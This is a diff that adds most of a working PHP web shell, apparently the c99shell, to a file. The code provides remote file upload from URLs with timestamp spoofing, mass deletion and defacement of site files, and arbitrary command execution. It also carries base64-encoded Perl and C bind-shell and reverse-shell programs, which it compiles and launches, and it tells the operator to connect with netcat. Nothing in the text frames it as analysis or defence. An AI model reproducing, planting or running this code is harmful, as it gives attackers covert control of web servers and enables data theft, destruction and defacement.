+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if (empty($sort[1])) {$sort[1] = "d";}
+   if ($sort[1] != "a")
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+   }
+   else
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";}
+    else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b></center><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    myshellexec($cmd);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
